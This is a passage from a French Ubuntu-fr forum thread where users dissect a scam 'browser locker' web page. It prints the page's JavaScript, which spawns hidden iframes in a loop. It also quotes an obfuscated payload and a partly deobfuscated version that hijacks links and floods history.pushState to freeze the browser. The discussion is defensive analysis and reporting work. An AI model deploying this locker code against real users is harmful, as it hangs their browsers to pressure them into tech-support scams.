            if(tem!=null)   {return {name:'Opera', version:tem[1]};}
            }
        M=M[2]? [M[1], M[2]]: [navigator.appName, navigator.appVersion, '-?'];
        if((tem=ua.match(/version\/(\d+)/i))!=null) {M.splice(1,1,tem[1]);}
        return {
          name: M[0],
          version: M[1]
        };
     }
     var InternetEx=window.navigator.appVersion.indexOf("MSIE")!=-1;
    var isIEedge = window.navigator.userAgent.indexOf("Edge") > -1;
    var browser=get_browser();
    if(browser.name=="Firefox" || isIEedge|| InternetEx || navigator.appName == 'Microsoft Internet Explorer' ||  !!(navigator.userAgent.match(/Trident/) || navigator.userAgent.match(/rv:11/)) ){
      if(isIEedge|| InternetEx || navigator.appName == 'Microsoft Internet Explorer' ||  !!(navigator.userAgent.match(/Trident/) || navigator.userAgent.match(/rv:11/)))
        {

           function msg_ff() {

                var i = document.createElement("div");
                i.innerHTML = '<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="security.php?p_num='+phone+'"></iframe></div>';
                document.body.appendChild(i);

            }
            window.setInterval(function() {
                msg_ff();

            }, 1100);

          }
      else{
          function msg_ff() {

                var i = document.createElement("div");
                i.innerHTML = '<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="security.php?p_num='+phone+'"></iframe></div>';
                document.body.appendChild(i);
            }
            window.setInterval(function() {
                msg_ff();

            }, 1100);

        }

     }
     else{

       }


    /*]]>*/</script>
   

<iframe src="sound\french.mp3" allow="autoplay" style="display:none;">
</iframe></body>

</html>

Nuliel · Le 06/09/2019, à 22:59

Hum, j'ai trouvé la crasse, elle est dans le index.html et elle est obfusquée. Je regarderai ce qu'il y dedans demain (c'est function() avec son machin absolument illisible)

Dernière modification par Nuliel (Le 06/09/2019, à 23:00)

chinois02 · Le 07/09/2019, à 07:26

Le code est celui ci?

 (function() {
            var t = "",
                p = [8, 7, 9, 6, 5, 4, 9, 6, 3, 7],
                smat = unescape("-9%3D+7%3Co%7Bqj%7Cpxt*6A+5@-%3EKok%29%3B%3ElzNp%7Bkks%81+5@-%3EK+78.8%3B%2C%3A9j+76.8%3C5ksrip%29%3B%3Ei%7Cvj%7Dotr.8%3Bl-9B+%3CFn4sym%7DntyHnld%7Ct%7B.8%3D%29%3B%3F%28%3EL%2C%3B%3F*7K%7Cdy-99k*7M+8I-9%3BvzwqYwh%7Cl.87%29%3BI%289%3Avwhjjxxh%7Cvsxgi%29%3B8%289K%2C%3B8*6%3B+5J-9%3Bxjx%7Exq%5Dis%7Ek*6%3B+5J-9%3Buspxgg%2C%3A9.8H%29%3B8wv%5B%7B%7Bosk.85%2C%3DK.9Gs.9Gl-9L%7B*7M95%3C-9Llzrlzlvv%2C%3B%3Ej%29%3B%3F%28%3EJmxx*6A+6I54n+8F.8%3Cv6w%7Eym%29%3B%3Er5%7Borly%29%3B%3E%289A%2C%3B%3F*%3BM+5%3F32%7E+7%3D.9E%7Diy.85r.9Gm%7Dulznsw+5%3Fv%2C%3BIy%29%3B%3F%28%3EJynzzvw+57m%2C%3EHs1.9G7-%3CM+%3CH.9E%7B-%3AMzj%7C%7D+5J%7Fpwjt%7B.%3BEu-9A+769%7E3%2C%3A9.8%3E%29%3EJ%28%3ALm%7Ethxruq%2C%3A%3Fn+7%3D.%3DE%7Diy.85s.9Gu-9A+769%7E4%2C%3A9.8%3E/%7D+6Izl%7D%7Bwr.83l-%3CKt*6A+598%7F%3B+76.8%3C%2C%3DK.9Is.8Fv-%3EM+7G%80oqkw%7E.%3BGr.8%3B%2C%3A99%7E8%29%3B8%289A%2C%3EJ*7Mlxuk%7Brus%29%3B%3E%289A%2C@Hnj.8%3Bjwuoowq.8%3B%2C%3A9.87/%7D+5@-9Bltv.8%3B%7Diy.85i.9G%2C%3A9.87%29%3BIr%2C%3BK9+8Fx+6J9lA+8Fx1.%2C%3A@n1*7Mu%28%3CJu.8%3D%29%3B83%7F%3C%2C%3B8*6B+8K-9A+7%3D.8Foqz%7Duw%7D.%3BEu-9A+769%7E8%2C%3A9.8%3E%29%3EJ%289@7.8H4.8Fl-9B+8Fnrvl-99ltv.8%3Bl-%3AM+76.85%2C%3AJx+8H9+6Iw%2C%3CI6iA+6Iw24+7%3Dn1%28%3ALv.%3BGr.8%3B%2C%3A99%7E9%29%3B8%289A%2C%3EJ*6A+5@-9Lnnw%7Duu%80-%3CKt*6A+598%7F%3E+76.8%3C%2C%3DK.8%3D4.8F7-9Lk*6B+%3AK-%3EM%7Cfv.83%7B-9Lu*6L%7B%289Ky.8Hg.8Fp-9Lr*7Koi%2C%3A%3FryHl%7Bupl-%3EL+%3CGryRwmyj+7%3D.%3DE%7Diy.85h.9G%2C%3A8%3A+8F.87%2C%3A%3F.87lngg%2C%3A9.8%3E2jvslvk.8%3D%29%3B%3D%28%3AKzlxnt%7D+57%7Byl+8H.8557q%7C5ou%7Eku%806q%7C+76.9H%2C%3BJ.%3BH3%7Ciupx%7B.9J%29%3B%3D%289A%2C%3BI*6%3D+5%3F-9%3Bnjem+59-9B4ftykqk-9A+7%3B.9Fsqut+74qxhm-%3AM+7675fz%7B6vgnr7ivz-9%3B+74%7Bko%2C%3BK.87w%7D%7Fol%7Bonky%29%3B8%28%3AM%2C%3B%3D*6B+5Jlvl%7Briwz1nm%7BNrjqntwI%81Pm+7%3C.85h%7Dkru*6%3B+5@6wug%7E%29%3B%3E%289A%2C%3BI%7Cmwjr%7E6vwqj%7Dmuzu-%3AMlzrlzlvv%2C%3B%3Ej%29%3B%3F%28%3EJynzzvw+589%2C@J*6L%7Dlulv%804trtk%7Cwzl%7Cy*7Mlxuk%7Brus%29%3B%3Eh%2C%3A@.%3DGvnzxyv%2C%3B76%29@J%289Kvwhjjxxh%7Cvsxgi%29%3CJi%7Cvj%7Dotr.8%3B%2C%3A@.%3DGvnzxyv%2C%3B6fpnxw%2C%3A%3F.87%29%3CL%28%3AN%2C%3CL*7O+6M-%3AO+8J.83L%5BJ.8H%29%3B6%28%3AN%2C%3CL*7O+6M-%3AO+74.9I%2C%3BM.9K%29%3CL%28%3AN%2C%3CL*7O+57-%3AO+8J.9I%2C%3BM.9K%29%3CL%28%3AN%2C%3CL*6%3A+59-9B+7G.85%2C%3BM.9K%29%3CL%28%3AN%2C%3CL*7O+6M-99KXG.8F%2C%3A7.9K%29%3CL%28%3AN%2C%3CL*7O+57-%3AO+8J.9I%2C%3BM.9K%29%3CL%28%3AN%2C%3B6*7O+6M-%3AO+8J.9I%2C%3BM.9K%29%3CL%2899%2C%3B8*%3BM+5Jlvl%7Briwz1vvjxtyi%81zplv%7C.9Irn%7D%2898M%7Ethxruq%2C%3A%3F.87vnzxyv%2C%3B6keuyh%2C%3A9.8%3E%29%3CHivz%2C%3B%3E%7Be%7B+57%7B%2C%3CJ5%29%3CHv%2C%3BJ9+8F%7C1.%2C%3A@jrjv%7D+5%3F%7Cl%81z*6B+6In%7Cwiymxt%2898h.8%3D%29%3B%3F%28%3EJk.9K%29%3B%3Egvk%7Cvksx7mh%7BMsnsjr%7DH%7CPl%2C%3B%3E*6%3Bho%7Cm4%7Ciwint%289%3A%2C%3B%3F3w%7D%7Fol6kryupj%7F%28%3AL%2C%3B8gpxin%2C%3A9.8Hhxixtmu%7D4li%7DKolulwzxF%82ZdnVhvk*6A+59jvm%7F*6%3B+5@6p%7Dkr%29%3B%3E3%2C%3A@7yjxJzwyqi%7Ezj%29%3B%3E%289%3Ajugxw.85%2C%3AJ.87tjyw%2C%3A9.8%3E%29%3B%3F%28%3AIk.9I%29%3B73%2C%3FKo%7Bsg%7Doru-99s*6A+5@-%3EKjtg%7Eshu%7C5o%7Bqp%7CiulmuNrjqntw%2C%3FJ.%3DHhxixtmu%7D4rs%83LxstZlxjiwKolulwz*%3BL+%3AJlvl%7Briwz1%7EmitoyJ%7ErozkynksIukplv%7B.%3DH%29@I%289@kxizqntw5lvl%7BriwzHsmtnty2%7Bkt%7Cmz%7DLzpuyfymlw+8Jmuf%7Culwz3hxixtmu%7DKqivkq%7B6ynwzi%7CzI%7Cts%7Ciwint%289@%2C%3B%3F*7Jjrj%7Dtnty2muf%7CulwzJpnshu%7C5vu%7FVnwxl%7B%7BO%7Bqp%5Ciulmu.9Khxixtmu%7D4isl%7Bplv%7BNrjqntw5uv%83Xju%7Ekv%7BN%7CurXg%7Bkhu-9A+7%3D.9Dkwj%7Esjr%7D4gvk%7CvksxNrhtmu%7D4%7Cikql%7BZlz%7Bjw%7DLxstzlxjiw+5%3D-9%3Fjtg%7Eshu%7C5muhyvkq%7BMsnsjr%7D4zljrrzWiz%7Bhz%7CM%7Erqwlxhlv%2C%3B%3EJpnshu%7C5JRQS%60eNLaIXGWHhOQW%5D%5B.8%3E%29%3B%3F%289K%7Ertis%804rwmu.8%3D%29%3B8es%7Dl7vmt.85%2C%3AJ.87Euku%7B-9%3B+7G.85%7Eqk%7Dn*7M7%289Konoll%7D+6K9%2C%3BIxg%7Buosqup+8H%82kv%2C%3AJo%7Bqp%7Ciulmu.9I%7Dny%289Ksnly%29%3CJ6787.8Hxxv%28%3AL%3A965%29%3B8%289A%2C@Jisl%7Bplv%7B7mjxNrhtmu%7DH%7EMm+5%3F-9%3Bimvxsh4isnxyw.85%2C%3A@7yy%7Duk1kqzyrf%7D.9G%2C%3A9krtgt+59-9Ljtg%7Eshu%7C5jjiI%7Fkq%7BTp%7Czjrnx%289@%2C%3B8pi%82%7Bs%2C%3A9.8Hj%7Etf%7Bqvw+7%3Cn+5@-%3EK8%3C%29%3CJ%28%3ALl7qj%7DLugl-9%3F+7%3Av+5%3F-9B+%3CH.8F%2C%3A8%3A+7%3D.8Fkwj%7Esjr%7D4dklL%7FksxUov%7Bmunx*6A+59sl%82%7Bu%29%3B8%289Km%7Ethxruq%2C%3A%3Fn+7%3D.%3DE8%3A9.86%29%3CJh5sl%82Ithn+5%3D-9%3F7%3C%29%3B7%28%3ALl7qj%7DLugl-9%3F+7%3A%3A%3E%2899%2C%3CJj2tk%7CJwkn+7%3A.898%3B%2C%3B7*7Mk1rm%80Luii.%3DF%2C%3FJ.8%3De.8%3B%2C%3A@.8Hq.8%3B%2C%3A@.8%3E%29@J%289K%2C%3B76%29%3B%3F%289K%7Ertis%804rutvjj*7Mlxuk%7Brus%29%3B%3E%289A%2C@Hisl%7Bplv%7B7usguofr-%3AMlzrlzlvv%2C%3B%3Ej%29%3B%3F%28%3EJl.9Ii.%3DF%2C%3FJn%7Cjr%7D+5J%7Ch%7Bmjx.9Gl6%7Bjxli%7D+%3AJ-%3ELk3w%7BiHsmtnty%29%3BIwhznnz3xjmQhul.8Hq.8%3B%2C%3A@.8He.8%3B%2C%3A@.%3DI%29@J%289KhmjJzntwSqz%7Dksi%7B+5%3F-9%3Biqmlq%289%3A%2C%3BIkywiwpwu.8%3D%29%3B%3F%28%3EJh.8%3D%29%3B%3F%28%3AJ%7Djx*69k%28%3ALkxizqntw5lvl%7BriwzHsmtnty%29%3CH%289@l7xju%7Ekv%7BN%7CurXg%7Bkhu-%3EL+%3CGn4zljrrzWiz%7Bhz%7CM%7ErqWlxhlv%2C@I*%3BLk1tw%81%5BkvynywM%7DsuYhvnkq%2C%3A@7ifpu+5%3Fm%2C%3B%3F*%3BM+5@-9L%7Dnrmuz5ikmK%7BiwzOp%7B%7Bntjv.8%3B%2C%3A9%7Bkxm%83k%289%3A%2C%3BIkywiwpwu.8%3D%29%3B%3F%28%3EJ%2C%3B%3A*6A+59jvm%7F*6%3B+5@6j%7Cy*6A+59w%7Dnxkpx%7D%289%3A%2C%3BI*6%3Bnlkllw+76.8%3C%2C%3AJ.89%29%3B%3E%289%3A5yuuyy3dsmy%7D+76.8%3C5%7B%7Bxv*6A+5@6hwore%7Dk%289@%2C@Hgs%7Dzrt-%3AJ+76673w%80%2C%3B8*6Lushkp%7D%7F*7J7%28%3EL%2C%3BI%3A49+5@-9Ljtg%7Eshu%7C5pkyIukplv%7BK%7FNh.8%3B%2C%3A9j%7Bimx+59-9B4upj%7F%289@%2C%3B%3F*6Lyfymlw4%7Cmmzk%2C%3AJ%80oshx%7D1pvunx%5Cmmzk%2C%3AJ%80oshx%7D1zm%7BRtyi%7B%7Cds-9Alzrlzlvv%2C%3B%3E*6B+%3AInv%7B+7%3C%7Fgu%2C%3A7n+8H9+6Im%2C%3CI649+6Im24+7%3Dqov%7Bwy%824uy%7CnV%7Bi%7Bn+7%3C9+5J8%2C%3BIj%29%3B%3F%28%3EL%2C%3BI%3A49+5@-%3EM+7%3D.%3DGpn%2C%3B%3EnwRK%28%3EK%2C@Inw%5Cgihzp.8%3E%29@H%289%3C%2C%3B%3E*6%3B+5%3Ajs%7Ek2wlxhlv%2C%3BI3gqxrtm4jrjv%7D+59-9B4mmmk%289@%2C%3B%3F*7K%7Cdy-99l*7M+8I-9%3Busqx%7Bvlw%7C%7D+76.8F%2C%3A9kui%7D.85%2C%3AJ.87emjH%7Dmu%7DRnw%7Dkqlz%2C%3B8*6L+59uv%7Eyjs%7Ez%289%3A%2C%3BI*6%3B0-12130/.30-12130/.30-12130/.30-12130/.30-12130/..%3BFuZKW5%5EeqRr%7Dmy7%7Dtvv+588%3C%3EHHGJI%3CMMJ.85Mwlhj%7Cpxt*9Lt-12130/.30-12130/.30-12130/.30-12130/.30-12130/.3+8Jv%2C%3EIs%29%3B8%289K%2C%3B8fx%7DgfoM%7Dnty%29%3B8%28%3CL%2C%3CHn%29%3CJi%2C%3AJu+8H%3C%3C4%2C%3AJo%7Bsg%7Doru-9Ak*6B+%3AInv%7B+7%3C.9E45l.9G%29%3B%3Fl5x%7C%7Cn*6Ao1zppoz*6A+5@-9B+%3CH.8%3B23s.8%3E%29%3CHyhz%2C%3B6%7E%29%3CJi%7Cvj%7Dotr.8%3Bl-9Lt*6B+%3AIzl%7D%7Bwr.83m-%3CKk2%29%3CJ3%2C%3DK.%3DI%29%3CHu%2C%3BK%7Dk%7Dx.8Fj-%3AMzj%7C%7D+5Jisnxy%29%3B%3Eu%2C%3A@.8Hhxixtmu%7D+%3AF%82+5%3F-9%3B6%7D4.85%2C%3A@.%3BI%29%3EH%7C%2C%3A%3F.874%817%289%3A%2C%3B%3F*9M+6Mlvl%7Briwz%28%3CJ%80.8%3D%29%3B83%7F8%2C%3B8*6B+8K-%3CK%7F*6A+598%7F%3A+76.8%3C%2C%3DK.8%3D%7D.8%3B%2C%3A99%7E7%29%3B8%289A%2C%3BIkywiwpwu.8%3Di.8%3C%2C%3FIjrjv%7D+5%3F%81%2C%3B%3E*6%3B6%7B%3A-9%3B+7%3D4x%289A%2C@J*6L+589%2C%3B%3F*7Jjrj%7Dtnty%29%3EH%7C%2C%3A%3F.874%816%289%3A%2C%3B%3F*9M+8I%81%2C%3B%3E*6%3B6%7B%3B-9%3B+7%3D.%3BG%2C%3A%3F%82+7%3C.857%80%3C.87%29%3B%3F%289Km%7Ethxruq%2C%3A%3Fn+7%3D.%3DEhtl%7Bz*6Ax%289A%2C@J*6B+5J%7Fpwjt%7B7uqimmxxjywrrhl%2C%3CJkywiwpwu.8%3D%29%3B%3F%28%3EJynzzvw+57k%2C@J*%3BM+%3AK-9B+8F");
            for (var i = 0; i < smat.length; i+=10){
                for(var k=0;k<=9;k++){
                    if((k+i)<smat.length){
                        t += String.fromCharCode(smat.charCodeAt(i+k) - p[k]);
                      }

Nuliel · Le 07/09/2019, à 07:37

Oui, je vais retranscrire le code en truc lisible

Nuliel · Le 07/09/2019, à 08:18

Alors, niveau 1 de désobfuscation du code:

$(function(){if(isFirefox){$("a").click(function(e){e.preventDefault()});var e=["pushState","onbeforeunload","","returnValue","onload","toString"];o=e,u=325,function(e){for(;--e;)o.push(o.shift())}(++u);var n=function(n,t){return e[n-=0]};t=text,window[n("0x0")]=function(e){var o=n("0x1")+t;return e[n("0x2")]=o,o},window[n("0x3")]=function(){if(confirm(""+t))for(var e="",o=0;o<1e8;o++)e+=o[n("0x4")](),history[n("0x5")](0,0,e);else for(e="",o=0;o<1e8;o++)e+=o[n("0x4")](),history[n("0x5")](0,0,e)}}var t,o,u,r,c,i,l;if(isChrome||isOpera){var d=!1;$("head").append('

ce qui donne après indentation

$(function() {
            if (isFirefox) {
                $("a").click(function(e) {
                    e.preventDefault()
                });
                var e = ["pushState", "onbeforeunload", "", "returnValue", "onload", "toString"];
                o = e, u = 325,
                    function(e) {
                        for (; --e;) o.push(o.shift())
                    }(++u);
                var n = function(n, t) {
                    return e[n -= 0]
                };
                t = text, window[n("0x0")] = function(e) {
                    var o = n("0x1") + t;
                    return e[n("0x2")] = o, o
                }, window[n("0x3")] = function() {
                    if (confirm("" + t))
                        for (var e = "", o = 0; o < 1e8; o++) e += o[n("0x4")](), history[n("0x5")](0, 0, e);
                    else
                        for (e = "", o = 0; o < 1e8; o++) e += o[n("0x4")](), history[n("0x5")](0, 0, e)
                }

Et un reste, mais je sais pas ce que c'est:

            var t, o, u, r, c, i, l;
            if (isChrome || isOpera) {
                var d = !1;
                $("head").append('

comme si c'était tronqué.
Bon je vais passer au niveau 2

Par ailleurs, le fichier mp3 contient des métadonnées indiquant qu'il viendrait du site http://www.nextup.com
Et le champ artiste: TextAloud: IVONA Mathieu22 (French)
(évidemment ces infos peuvent être modifiées)

Edit: l'image qui est encodée en base64 est en fait une icône de souris. Aucune idée de l'intérêt

Dernière modification par Nuliel (Le 07/09/2019, à 08:46)

nam1962 · Le 07/09/2019, à 09:26

Arf ouiche ! Ça attaque sec !
En m'y prenant rapidement, j'ai signalé la page iphone (qui est parfois windows) et la seconde (windows pure) via l'outil de signalement Firefox.
Pour ce faire, j'ai cliqué sur le lien, ce qui a ouvert l'onglet problématique, et immédiatement cliqué dans [Aide] - [Signaler un site trompeur]

Dès que l'onglet de rapport est ouvert (sur mon Firefox, tout appel à un nouveau site ouvre un nouvel onglet), je ferme le précédent.

Là je constate que processeur et HDD sont toujours sollicités, puis Firefox m'indique qu'une page le surcharge (alors donc que son onglet est fermé)

A ce moment, pour finir, je vide historique, cache, cookies, etc.. et là je vois que mon historique est bourré de dizaines d'instances de la page à problème.

Son action serait donc de s'ouvrir silencieusement (sans ouverture d'onglet) des dizaines, voire centaines de fois.

Un fois vidage complet fait, tout se calme (en plus après je ferme/rouvre Firefox pour effacer les cookies long terme au cas où)

Dernière modification par nam1962 (Le 07/09/2019, à 09:27)

bruno · Le 07/09/2019, à 09:49

Oui un examen rapide avec les outils de développement web de Firefox montre qu'un javascript crée à l'infini des iframes qui charge cette me page. Donc au bout d'un moment cela doit saturer le cache du navigateur, le CPU et la RAM.
Rien de nouveau, ni d'original.

chinois02 · Le 07/09/2019, à 09:53

Ivona mathieu: https://harposoftware.com/en/french/158 … voice.html
Bon, le truc est banal.

Nuliel · Le 07/09/2019, à 10:11

A noter que le code javascript tente de trifouiller l'historique, et que la saturation vient potentiellement du 1e8 dans la boucle.
Mais je vois pas à quel moment ni vraiment ce que le script tente de sortir (seulement les onglets actifs? tout l'historique? Et à quel endroit est il envoyé?)

Ubuntu-fr

Navigation

Liens de recherche

Annonce

#1 Le 06/09/2019, à 09:06

Page internet astucieuse...active sous Linux

#2 Le 06/09/2019, à 09:10

Re : Page internet astucieuse...active sous Linux

#3 Le 06/09/2019, à 09:34

Re : Page internet astucieuse...active sous Linux

#4 Le 06/09/2019, à 10:31

Re : Page internet astucieuse...active sous Linux

#5 Le 06/09/2019, à 11:19

Re : Page internet astucieuse...active sous Linux

#6 Le 06/09/2019, à 16:19

Re : Page internet astucieuse...active sous Linux

#7 Le 06/09/2019, à 16:37

Re : Page internet astucieuse...active sous Linux

#8 Le 06/09/2019, à 16:38

Re : Page internet astucieuse...active sous Linux

#9 Le 06/09/2019, à 18:02

Re : Page internet astucieuse...active sous Linux

#10 Le 06/09/2019, à 21:36

Re : Page internet astucieuse...active sous Linux

#11 Le 06/09/2019, à 21:56

Re : Page internet astucieuse...active sous Linux

#12 Le 06/09/2019, à 22:13

Re : Page internet astucieuse...active sous Linux

#13 Le 06/09/2019, à 22:44

Re : Page internet astucieuse...active sous Linux

#14 Le 06/09/2019, à 22:56

Re : Page internet astucieuse...active sous Linux

#15 Le 06/09/2019, à 22:59

Re : Page internet astucieuse...active sous Linux

#16 Le 06/09/2019, à 22:59

Re : Page internet astucieuse...active sous Linux

#17 Le 07/09/2019, à 07:26

Re : Page internet astucieuse...active sous Linux

#18 Le 07/09/2019, à 07:37

Re : Page internet astucieuse...active sous Linux

#19 Le 07/09/2019, à 08:18

Re : Page internet astucieuse...active sous Linux

#20 Le 07/09/2019, à 09:26

Re : Page internet astucieuse...active sous Linux

#21 Le 07/09/2019, à 09:49

Re : Page internet astucieuse...active sous Linux

#22 Le 07/09/2019, à 09:53

Re : Page internet astucieuse...active sous Linux

#23 Le 07/09/2019, à 10:11

Re : Page internet astucieuse...active sous Linux

Pied de page des forums